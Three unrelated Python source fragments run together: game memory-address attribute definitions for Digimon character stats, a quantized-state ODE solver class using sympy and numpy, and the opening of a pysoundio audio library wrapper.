Attribute(
name="Angemon Cross Effect",
addresses=[0x266a75c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#R-Gatomon 083
Attribute(
name="R-Gatomon Element",
addresses=[0x266a7ce],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 83),
max_value=Get_Element_Type(32, 2, 83),
is_little_endian=True, ),
Attribute(
name="R-Gatomon +DP",
addresses=[0x266a7d0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="R-Gatomon HP",
addresses=[0x266a7d2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(750,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(750,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Circle",
addresses=[0x266a7d4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(410,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(410,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Triangle",
addresses=[0x266a7f0],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(300,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(300,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Cross",
addresses=[0x266a80c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(210,nature_special_modifier,champion_modifier,4),
max_value=Max_Cross_Multiplier(210,nature_special_modifier,champion_modifier,4),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="R-Gatomon Cross Effect",
addresses=[0x266a898],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Togemon 084
Attribute(
name="Togemon Element",
addresses=[0x266a90a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 84),
max_value=Get_Element_Type(32, 2, 84),
is_little_endian=True, ),
Attribute(
name="Togemon +DP",
addresses=[0x266a90c],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Togemon HP",
addresses=[0x266a90e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(800,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(800,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Circle",
addresses=[0x266a910],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(380,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(380,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Triangle",
addresses=[0x266a92c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(250,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(250,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Cross",
addresses=[0x266AA78],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(170,nature_special_modifier,champion_modifier,3),
max_value=Max_Cross_Multiplier(170,nature_special_modifier,champion_modifier,3),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Togemon Cross Effect",
addresses=[0x266AB04],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Leomon 085
Attribute(
name="Leomon Element",
addresses=[0x266ab76],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 85),
max_value=Get_Element_Type(32, 2, 85),
is_little_endian=True, ),
Attribute(
name="Leomon +DP",
addresses=[0x266ab78],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Leomon HP",
addresses=[0x266ab7a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(890,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(890,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Circle",
addresses=[0x266ab7c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Triangle",
addresses=[0x266ab98],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(280,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(280,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Cross",
addresses=[0x266abb4],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(200,nature_special_modifier,champion_modifier,0),
max_value=Max_Cross_Multiplier(200,nature_special_modifier,champion_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Leomon Cross Effect",
addresses=[0x266ac40],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Kabuterimon 086
Attribute(
name="Kabuterimon Element",
addresses=[0x266acb2],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 86),
max_value=Get_Element_Type(32, 2, 86),
is_little_endian=True, ),
Attribute(
name="Kabuterimon +DP",
addresses=[0x266acb4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Kabuterimon HP",
addresses=[0x266acb6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(950,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(950,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Circle",
addresses=[0x266acb8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(550,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(550,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Triangle",
addresses=[0x266acd4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(360,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Cross",
addresses=[0x266acf0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,nature_special_modifier,champion_modifier,5),
max_value=Max_Cross_Multiplier(0,nature_special_modifier,champion_modifier,5),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kabuterimon Cross Effect",
addresses=[0x266ad7c],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Airdramon 087
Attribute(
name="Airdramon Element",
addresses=[0x266adee],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 87),
max_value=Get_Element_Type(32, 2, 87),
is_little_endian=True, ),
Attribute(
name="Airdramon +DP",
addresses=[0x266adf0],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Airdramon HP",
addresses=[0x266adf2],
number_of_bytes=2,
min_value=Min_HP_Multiplier(950,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(950,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Circle",
addresses=[0x266adf4],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(430,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Triangle",
addresses=[0x266ae10],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(200,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Cross",
addresses=[0x266ae2c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(50,nature_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(50,nature_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Airdramon Cross Effect",
addresses=[0x266aeb8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Unimon 088
Attribute(
name="Unimon Element",
addresses=[0x266af2a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 88),
max_value=Get_Element_Type(32, 2, 88),
is_little_endian=True, ),
Attribute(
name="Unimon +DP",
addresses=[0x266af2c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Unimon HP",
addresses=[0x266af2e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(950,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(950,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Circle",
addresses=[0x266af30],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Triangle",
addresses=[0x266af4c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(210,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(210,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Cross",
addresses=[0x266af68],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(150,nature_special_modifier,champion_modifier,2),
max_value=Max_Cross_Multiplier(150,nature_special_modifier,champion_modifier,2),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Unimon Cross Effect",
addresses=[0x266aff4],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Ninjamon 089
Attribute(
name="Ninjamon Element",
addresses=[0x266b066],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 89),
max_value=Get_Element_Type(32, 2, 89),
is_little_endian=True, ),
Attribute(
name="Ninjamon +DP",
addresses=[0x266b068],
number_of_bytes=2,
possible_values=Thirty_DP_Change,
is_little_endian=True,),
Attribute(
name="Ninjamon HP",
addresses=[0x266b06a],
number_of_bytes=2,
min_value=Min_HP_Multiplier(650,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(650,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Circle",
addresses=[0x266b06c],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(440,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(440,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Triangle",
addresses=[0x266b088],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(350,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(350,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Cross",
addresses=[0x266b0a4],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(250,nature_special_modifier,champion_modifier,1),
max_value=Max_Cross_Multiplier(250,nature_special_modifier,champion_modifier,1),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Ninjamon Cross Effect",
addresses=[0x266b130],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Kuwagamon 090
Attribute(
name="Kuwagamon Element",
addresses=[0x266b1a2],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 90),
max_value=Get_Element_Type(32, 2, 90),
is_little_endian=True, ),
Attribute(
name="Kuwagamon +DP",
addresses=[0x266b1a4],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Kuwagamon HP",
addresses=[0x266b1a6],
number_of_bytes=2,
min_value=Min_HP_Multiplier(900,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(900,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Circle",
addresses=[0x266b1a8],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(530,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(530,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Triangle",
addresses=[0x266b1c4],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(400,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(400,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Cross",
addresses=[0x266b1e0],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(0,nature_special_modifier,champion_modifier,6),
max_value=Max_Cross_Multiplier(0,nature_special_modifier,champion_modifier,6),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Kuwagamon Cross Effect",
addresses=[0x266B39C],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Drimogemon 091
Attribute(
name="Drimogemon Element",
addresses=[0x266B40E],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 91),
max_value=Get_Element_Type(32, 2, 91),
is_little_endian=True, ),
Attribute(
name="Drimogemon +DP",
addresses=[0x266b410],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Drimogemon HP",
addresses=[0x266b412],
number_of_bytes=2,
min_value=Min_HP_Multiplier(850,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(850,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Circle",
addresses=[0x266b414],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(450,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(450,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Triangle",
addresses=[0x266b430],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(310,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(310,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Cross",
addresses=[0x266b44c],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(280,nature_special_modifier,champion_modifier,0),
max_value=Max_Cross_Multiplier(280,nature_special_modifier,champion_modifier,0),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Drimogemon Cross Effect",
addresses=[0x266b4d8],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Vegiemon 092
Attribute(
name="Vegiemon Element",
addresses=[0x266b54a],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 92),
max_value=Get_Element_Type(32, 2, 92),
is_little_endian=True, ),
Attribute(
name="Vegiemon +DP",
addresses=[0x266b54c],
number_of_bytes=2,
possible_values=Twenty_DP_Change,
is_little_endian=True,),
Attribute(
name="Vegiemon HP",
addresses=[0x266b54e],
number_of_bytes=2,
min_value=Min_HP_Multiplier(810,nature_special_modifier,champion_modifier),
max_value=Max_HP_Multiplier(810,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Circle",
addresses=[0x266b550],
number_of_bytes=2,
min_value=Min_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
max_value=Max_Circle_Multiplier(390,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Triangle",
addresses=[0x266b56c],
number_of_bytes=2,
min_value=Min_Triangle_Multiplier(270,nature_special_modifier,champion_modifier),
max_value=Max_Triangle_Multiplier(270,nature_special_modifier,champion_modifier),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Cross",
addresses=[0x266b588],
number_of_bytes=2,
min_value=Min_Cross_Multiplier(100,nature_special_modifier,champion_modifier,10),
max_value=Max_Cross_Multiplier(100,nature_special_modifier,champion_modifier,10),
min_max_interval=10,
is_little_endian=True,),
Attribute(
name="Vegiemon Cross Effect",
addresses=[0x266b614],
number_of_bytes=1,
possible_values = cross_special_effect,
is_little_endian=True,),
#Kokatorimon 093
Attribute(
name="Kokatorimon Element",
addresses=[0x266b686],
number_of_bytes=1,
min_value=Get_Element_Type(32, 2, 93),
max_value=Get_Element_Type(32, | |
import sympy as S
import mpmath as poly
import numpy as N
class NoRealRoots(Exception):
pass
class ODE:
"""This class represents the ODEs and associated computation of time.
"""
MAX_QUANTA = 10**-3
NUM_TERMS = 5 # This should be adjustable
TRIG_FUNCS = [S.sin, S.cos, S.tan, S.cot, S.sec, S.csc]
INV_TRIG_FUNCS = [S.asin, S.acos, S.atan, S.acot, S.asec, S.acsc, S.atan2]
HYPERBOLIC_FUNCS = [S.sinh, S.cosh, S.tanh, S.coth, S.sech, S.csch]
INV_HYPERBOLIC_FUNCS = [S.asinh, S.acosh, S.atanh, S.acoth, S.asech,
S.acsch]
EXP_LOG = [S.exp, S.ln]
TRANSCEDENTAL_FUNCS = (TRIG_FUNCS + INV_TRIG_FUNCS + HYPERBOLIC_FUNCS +
INV_HYPERBOLIC_FUNCS + EXP_LOG)
def __init__(self, env, lvalue, rvalue, qorder=1, torder=1,
iterations=20, vtol=0, ttol=10**-2, taylor_expand=5,
trans_funcs=[], simplify_poly=False, half=False):
"""The quantized state order and taylor series order by default is 1.
The maximum number of back-stepping iterations is 20 be default.
The tolerance by default is 10^-2. taylor_expand gives the
number to terms that we expand transcendental function too,
default 5. Simplify the polynomial before finding roots, can
take a very long time. Usually simplification is needed if
polynomial has both a numerator and a denominator.
"""
self.env = env
self.lvalue = lvalue
self.rvalue = rvalue
self.qorder = qorder
self.torder = torder
self.iterations = iterations
self.vtol = vtol
self.ttol = ttol
ODE.NUM_TERMS = taylor_expand
ODE.TRANSCEDENTAL_FUNCS += trans_funcs
ODE.simplify_poly = simplify_poly
self.half = half
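# A minimal construction sketch (illustrative only; the symbol names and
# the `env` object are assumptions, not defined in this module; env is
# assumed to expose a `now` attribute, as used in _delta2 below). lvalue
# is expected to be a derivative whose first argument is the state
# function, since self.lvalue.args[0] is used as the dictionary key:
#
#   import sympy as S
#   x, t = S.Function('x'), S.Symbol('t')
#   ode = ODE(env, lvalue=S.Derivative(x(t), t), rvalue=-2*x(t),
#             qorder=1, torder=1, ttol=1e-2)
#   # ode.delta({x(t): 1.0}) would then return the next quantum-crossing time.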
@staticmethod
# XXX:
def replace(expr, s, v):
if expr == s:
return (S.sympify(v))
elif expr.args == ():
return expr
else:
return expr.func(*[ODE.replace(a, s, v)
for a in expr.args])
# XXX: Post order traversal
@staticmethod
def taylor_expand(expr, around=0):
if expr.args == ():
return expr
args = [ODE.taylor_expand(a) for a in expr.args]
if expr.func in ODE.TRANSCEDENTAL_FUNCS:
if len(args) != 1:
raise RuntimeError('Cannot create a taylor series '
'approximation of: ', expr)
else:
# XXX: Build the polynomial for arg
coeffs = poly.taylor(expr.func, around, ODE.NUM_TERMS)
# print(coeffs)
coeffs = [(S.Mul(float(a), S.Mul(*[args[0]
for i in range(c)])))
for c, a in enumerate(coeffs)][::-1]
# print(coeffs)
return S.Add(*coeffs)
else:
return expr.func(*args)
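# Illustrative sketch of what taylor_expand produces (approximate values,
# not a test): with NUM_TERMS = 5 and around = 0, a call such as
#   ODE.taylor_expand(S.sin(S.Symbol('y')))
# rebuilds sin(y) from mpmath's Maclaurin coefficients as roughly
#   y - y**3/6 + y**5/120,
# while non-transcendental expressions are returned unchanged.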
def compute(self, init, time):
# Now init is a dictionary of all the required initial values.
slope = self.rvalue
for k in init:
slope = ODE.replace(slope, k, init[k])
slope = slope.subs('t', time)
return init[self.lvalue.args[0]] + float(slope)*time
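# Note: compute() is effectively a single explicit-Euler step,
# x(t0 + time) ~ x(t0) + f(init, time) * time, with the slope obtained
# by substituting the initial values and the time into rvalue above.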
def _delta1(self, init):
return init[self.lvalue.args[0]]
def _delta2(self, init):
# slope = ODE.replace(self.rvalue, self.lvalue.args[0], init)
slope = self.rvalue
for k in init:
slope = ODE.replace(slope, k, init[k])
t = S.Symbol('t')
return (S.Add(init[self.lvalue.args[0]],
(S.Mul(slope, (t - self.env.now)))))
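# In QSS terms: _delta1 returns the zero-order quantized state (the last
# committed value, i.e. hysteresis), while _delta2 returns a first-order
# quantized state x0 + slope*(t - now) that follows the trajectory
# linearly. get_q() below selects between them based on qorder.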
def _taylor1(self, init, q, q2, quanta, count):
def is_den(x):
return (type(x) == S.Pow and x.args[1] == -1)
def compute_delta(part_poly, d, dl, quanta):
# XXX: Positive quantum, so polynomial - quanta = 0
polynomial1 = S.Add(part_poly, -quanta)
# XXX: Assumption that the time line is called "t"
# print(polynomial1)
if not ODE.simplify_poly:
polynomial1 = (polynomial1.expand().subs('t', d))
else:
polynomial1 = S.simplify(polynomial1.expand().subs('t', d))
ppoly = polynomial1
# XXX: Taking care of numerator and denominators after
# expansion.
if type(polynomial1) == S.Mul:
if not is_den(polynomial1.args[0]):
polynomial1 = polynomial1.args[0] # Get just the numerator
else:
polynomial1 = polynomial1.args[1]
# print('polynomial:', polynomial1)
# If "δ" vanishes after expansion then just return None
if (type(polynomial1) is S.Float):
return None
polynomial1 = S.Poly(polynomial1)
try:
nsoln = N.roots(polynomial1.all_coeffs())
nsoln = nsoln[N.isreal(nsoln)]
nsoln = nsoln[N.where(nsoln >= 0)]
# soln = poly.polyroots([poly.mpf(a) for
# a in polynomial1.all_coeffs()])
# print('1:', nsoln, soln)
except S.PolynomialError as e:
print('When trying to solve: ', ppoly)
raise e
# dl += [float(a) for a in soln
# if type(a) is poly.mpf and float(a) >= 0]
dl += list(nsoln)
# The second polynomial
# XXX: Negative quantum, so polynomial + quanta = 0
polynomial2 = S.Add(part_poly, quanta)
# XXX: Assumption that the time line is called "t"
if not ODE.simplify_poly:
polynomial2 = (polynomial2.expand().subs('t', d))
else:
polynomial2 = S.simplify(polynomial2.expand().subs('t', d))
ppoly = polynomial2
# print(ppoly.args[0], ppoly.args[1])
if type(polynomial2) == S.Mul:
if not is_den(polynomial2.args[0]):
polynomial2 = polynomial2.args[0] # Get just the numerator
else:
polynomial2 = polynomial2.args[1]
polynomial2 = S.poly(polynomial2)
try:
nsoln = N.roots(polynomial2.all_coeffs())
nsoln = nsoln[N.isreal(nsoln)]
nsoln = nsoln[N.where(nsoln >= 0)]
# soln = poly.polyroots([poly.mpf(a) for
# a in polynomial2.all_coeffs()])
# print('2:', nsoln, soln)
except S.PolynomialError as e:
print('When trying to solve: ', ppoly)
raise e
# dl += [float(a) for a in soln
# if type(a) is poly.mpf and float(a) >= 0]
dl += list(nsoln)
return dl
def get_d(q):
d = S.Symbol('d', positive=True, real=True)
# XXX: My rvalue can depend upon a whole vector of q's
# TODO: Convert it into a taylor series
# print(self.rvalue, q)
# XXX: Making a taylor polynomial if it is transcendental
# function
slope = ODE.taylor_expand(self.rvalue)
# print('slope: ', slope)
# print(q)
for k in q:
slope = ODE.replace(slope, k, q[k]).evalf()
# print(slope)
# XXX: IMP CHANGE! Here I am changing QSS to compare with a
# constant level, not with "Q". Note that q is the slope
# itself.
part_poly = S.Mul(d, slope)
# print('ppoly: ', part_poly.subs('t', 'd').expand().evalf())
# XXX: compute_delta solves for the roots of the polynomial
dl = compute_delta(part_poly, d, [], quanta)
if dl is None:
return None # The constant slope case
elif dl == []:
raise NoRealRoots('No real positive root for: ',
S.Eq(part_poly.subs('t', d).expand(),
quanta), '{:.2e}'.format(quanta))
d = min(dl)
return d
# print('getting δ1')
d1 = get_d(q) # Get the future time event from QSS-1
# print('getting δ2')
d2 = get_d(q2) # Get the future time event from modified QSS-2
if d1 is None:
return S.oo, quanta # This is returning infinity, wrong HA
if d2 is None:
# d1s = '{:.2e}'.format(d1)
# quanta = '{:.2e}'.format(quanta)
# print('chosen Δq: %s δ: %s' % (quanta, d1s))
return d1, quanta
elif abs(d1 - d2) <= self.ttol:
# d1s = '{:.2e}'.format(d1)
# d2s = '{:.2e}'.format(d2)
# pquanta = '{:.2e}'.format(quanta)
# print('chosen Δq: %s δ1: %s δ2: %s' % (pquanta, d1s, d2s))
# In this case we have satisfied εt so returning first δ
return d1, quanta
elif count < self.iterations:
# If the delta step results in output that is within the
# user-defined error bounds then great. Else, halve the
# quanta and keep doing this until the iteration limit
# is met. This is reducing the quanta in a geometric
# progression.
# XXX: Adaptive Stepsize Runge-Kutta Integration, William H.
# Press and Saul A. Teukolsky
newquanta = d1 * pow(abs(self.ttol / (d1 - d2)), 1.0/2)
quanta = newquanta if newquanta <= quanta else 0.5*quanta
return self._taylor1(init, q, q2, quanta, (count+1))
else:
raise RuntimeError('Could not find delta that satisfies '
'the user specified error bound: '
'ε: %s δ1: %s δ2: %s Q1: %s Q2: %s '
'Δq: %s. Increase iteration count'
% (self.ttol, d1, d2, q, q2, quanta))
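# Step-control sketch (assumed values, for illustration only): if the two
# predicted event times differ, say d1 = 0.10, d2 = 0.13 with ttol = 0.01,
# then newquanta = d1 * sqrt(ttol / |d1 - d2|) = 0.10 * sqrt(1/3) ~ 0.058;
# newquanta is adopted if it is no larger than the current quanta,
# otherwise the quanta is simply halved before retrying, mirroring
# adaptive step-size control in Runge-Kutta integrators.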
def _taylor(self, init, q, q2, quanta):
if self.torder == 1: # First order taylor only supported
# The delta step
return self._taylor1(init, q, q2, quanta, 0)
elif self.torder > 1:
raise RuntimeError('Currently only first order taylor supported')
def get_q(self, init, order):
# First calculate the q(t) given the qorder
if order == 1:
q = self._delta1(init)
elif order == 2:
q = self._delta2(init)
elif order > 2:
raise RuntimeError('Currently only up to QSS2 is supported')
return q
# XXX: This is the main function, which returns the future time
# event per level crossing per variable.
def delta(self, init, other_odes=None, quanta=MAX_QUANTA):
"""This is the main function that returns back the delta step-size.
Arguments: The initial value of the ode. Returns: The delta
step-size that is within the user specified error.
"""
# XXX: Here we are building the quantized states, i.e.,
# hysteresis for qorder=1 and integration for
# qorder=2.
qs = {self.lvalue.args[0]: self.get_q(init, self.qorder)}
q2s = {self.lvalue.args[0]: self.get_q(init, self.qorder+1)}
# XXX: Building the quantized states for other odes that we
# might depend upon, because we can have coupled ODEs.
if other_odes is not None:
for ode in other_odes:
qs[ode.lvalue.args[0]] = ode.get_q(init, ode.qorder)
q2s[ode.lvalue.args[0]] = ode.get_q(init, ode.qorder+1)
# XXX: delta is the returned value
delta, nquanta = self._taylor(init, qs, q2s, quanta)
# XXX: Handling sudden jumps
if self.half and | |
# -*- coding: utf-8 -*-
"""
pysoundio.py
Play and Record Sound in Python using libsoundio
libsoundio is a C library for cross-platform audio input and output.
It is suitable for real-time and consumer software.
"""
import logging
import threading
import time
from pysoundio._soundio import ffi as _ffi
from pysoundio._soundio import lib as _lib
from pysoundio import constants
class PySoundIoError(Exception):
pass
class _InputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.input['buffer']
self.callback = parent.input['read_callback']
self.bytes_per_frame = parent.input['bytes_per_frame']
self.daemon = True
self.running = True
self.start()
def run(self):
"""
When there is data ready in the input buffer,
pass it to the user callback.
"""
while self.running:
fill_bytes = _lib.soundio_ring_buffer_fill_count(self.buffer)
if fill_bytes > 0:
read_buf = _lib.soundio_ring_buffer_read_ptr(self.buffer)
data = bytearray(fill_bytes)
_ffi.memmove(data, read_buf, fill_bytes)
if self.callback:
self.callback(data=data, length=int(fill_bytes / self.bytes_per_frame))
_lib.soundio_ring_buffer_advance_read_ptr(self.buffer, fill_bytes)
time.sleep(0.001)
def stop(self):
self.running = False
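# The read callback registered on the input side is invoked as
# callback(data=..., length=...), where `data` is a bytearray of raw
# sample bytes and `length` is the frame count. A minimal sketch
# (names are illustrative, not part of this module):
#
#   captured = bytearray()
#   def read_callback(data, length):
#       captured.extend(data)   # e.g. buffer the raw bytes for later use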
class _OutputProcessingThread(threading.Thread):
def __init__(self, parent, *args, **kwargs):
super().__init__(*args, **kwargs)
self.buffer = parent.output['buffer']
self.callback = parent.output['write_callback']
self.bytes_per_frame = parent.output['bytes_per_frame']
self.sample_rate = parent.output['sample_rate']
self.block_size = parent.output['block_size']
self.to_read = 0
self.running = True
self.daemon = True
self.start()
def run(self):
"""
Request output data from user callback when there is
free space in the buffer.
"""
while self.running:
if self.to_read > 0:
data = bytearray(self.block_size * self.bytes_per_frame)
free_bytes = _lib.soundio_ring_buffer_free_count(self.buffer)
if free_bytes > len(data):
if self.callback:
self.callback(data=data, length=self.block_size)
write_buf = _lib.soundio_ring_buffer_write_ptr(self.buffer)
_ffi.memmove(write_buf, data, len(data))
_lib.soundio_ring_buffer_advance_write_ptr(self.buffer, len(data))
with threading.Lock():
self.to_read -= 1
time.sleep(0.001)
def stop(self):
self.running = False
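# The write callback is handed a pre-allocated bytearray of
# block_size * bytes_per_frame bytes and is expected to fill it in place;
# `length` is the number of frames requested. Sketch (illustrative only,
# next_block_of_pcm_bytes is an assumed helper):
#
#   def write_callback(data, length):
#       data[:] = next_block_of_pcm_bytes(len(data))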
class PySoundIo:
def __init__(self, backend=None):
"""
Initialise PySoundIo.
Connect to a specific backend, or the default.
Parameters
----------
backend: (SoundIoBackend) see `Backends`_. (optional)
"""
self.backend = backend
self.input = {'device': None, 'stream': None, 'buffer': None, 'read_callback': None, 'thread': None}
self.output = {'device': None, 'stream': None, 'buffer': None, 'write_callback': None, 'thread': None}
self.logger = logging.getLogger(__name__)
self._soundio = _lib.soundio_create()
if not self._soundio:
raise PySoundIoError('Out of memory')
if backend:
self._check(_lib.soundio_connect_backend(self._soundio, backend))
else:
self._check(_lib.soundio_connect(self._soundio))
self._userdata = _ffi.new_handle(self)
self.flush()
def close(self):
"""
Clean up allocated memory
Close libsoundio connections
"""
self.logger.info('Closing down threads...')
if self.input['thread']:
self.input['thread'].stop()
while self.input['thread'].is_alive():
time.sleep(0.001)
if self.output['thread']:
self.output['thread'].stop()
while self.output['thread'].is_alive():
time.sleep(0.001)
self.logger.info('Closing down streams...')
if self.input['stream']:
